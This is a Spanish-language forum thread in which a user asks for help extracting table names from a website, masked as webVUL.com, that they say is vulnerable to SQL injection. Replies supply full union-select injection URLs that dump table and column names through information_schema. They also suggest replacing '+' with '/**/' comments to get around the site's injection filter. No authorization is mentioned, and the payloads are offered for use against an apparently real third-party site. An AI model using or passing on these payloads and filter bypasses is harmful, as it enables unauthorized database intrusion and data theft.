 Autor
|
Tema: [Problema en SQL Inyect] (Leído 3,502 veces)
|
ChiikoMorocho
 Desconectado
Mensajes: 4
|
estoy intentando obtener los nombres de las tablas en una web vul. a SQLi, pero no logro avanzar, me detiene cuando inyecto: +from+information_schema.tables+where+table_schema='cebd'--cuando hago esto, no importa sino agrego el +limit+0,1-- me aparece el la pagina un error diciendo 503 la pagina no esta disponible, vuelva mas tarde entre otras cosas... no se como sacarlas... intente poner la base de datos "cebd" en ASCII pero lo mismo... alguna ayuda?....... Es vulnerable y hasta aqui me arroja las tablas 2,4,10 lo mas bien.,,: http://www.webVUL.com/xxx_xxx/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--y tambien he conseguido el nombre de la BD inyectando, asi que no logro deducir cual sea mi error... ------------------------------------------------ |
|
|
|
|
En línea
|
|
|
|
soez
Desconectado
Mensajes: 76
|
No se que numero te aparece cuando pones esto http://www.webVUL.com/xxx_xxx/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--si es el 2 por ejemplo para sacar las tablas seria http://www.webVUL.com/xxx_xxx/index.php?id=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables-- para sacar las columnas seria http://www.webVUL.com/xxx_xxx/index.php?id=-1+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name=char(nombre de la tabla en ascii separado por comas)-- ahi ya la tendras  PD. Si no ves todos los nombres en la pantalla mira el codigo fuente |
|
|
|
« Última modificación: 27 Abril 2010, 10:31 am por soez »
|
En línea
|
01001010 01100001 01110110 01101001 01100101 01110010 |
|
|
ChiikoMorocho
Desconectado
Mensajes: 4
|
ok flaco, gracias.se que es asi e intente saber las tablas y columnas pero me aparecia error en la pagina...revise bien la inyeccion y no hay errores...probare de nuevo aver q sucede..
luego comento.. =/
|
|
|
|
|
En línea
|
|
|
|
ChiikoMorocho
Desconectado
Mensajes: 4
|
Mira cuando intento agregar a la inyeccion para que me de las tablas y/o columnas.. me aparece esto: -- Service Temporarily Unavailable
The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request. |
|
|
|
|
En línea
|
|
|
|
alexkof158
Desconectado
Mensajes: 415
LOL
|
Mira cuando intento agregar a la inyeccion para que me de las tablas y/o columnas.. me aparece esto: -- Service Temporarily Unavailable
The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request. debe ser los filtros que utiliza para evitar inyecciones sql , intenta bypassear agregando caracter como /**/
|
|
|
|
|
En línea
|
|
|
|
ChiikoMorocho
Desconectado
Mensajes: 4
|
no entiendo muy bien lo que me decis, pero si me das un ejemplo bienvenido...!!!
ah e intentado con BLIND pero el problema es ... obvio, al no conocer la tabla "el nombre" intento con algunos pero ninguno acepto, me sale error en todos...
si me das un ejemplo de como dices tu bypasseando..quiza logre algo.
|
|
|
|
|
En línea
|
|
|
|
xassiz_
Desconectado
Mensajes: 273
Ich werde dich töten..
|
Prueba cambiar los + por /**/
|
|
|
|
|
En línea
|
 YXVuIGVyZXMgbWF0YWRvIHBhcmEgcG9uZXJ0ZSBhIGRlc2NpZnJhciBlc3RvIHhE |
|
|
|
 |
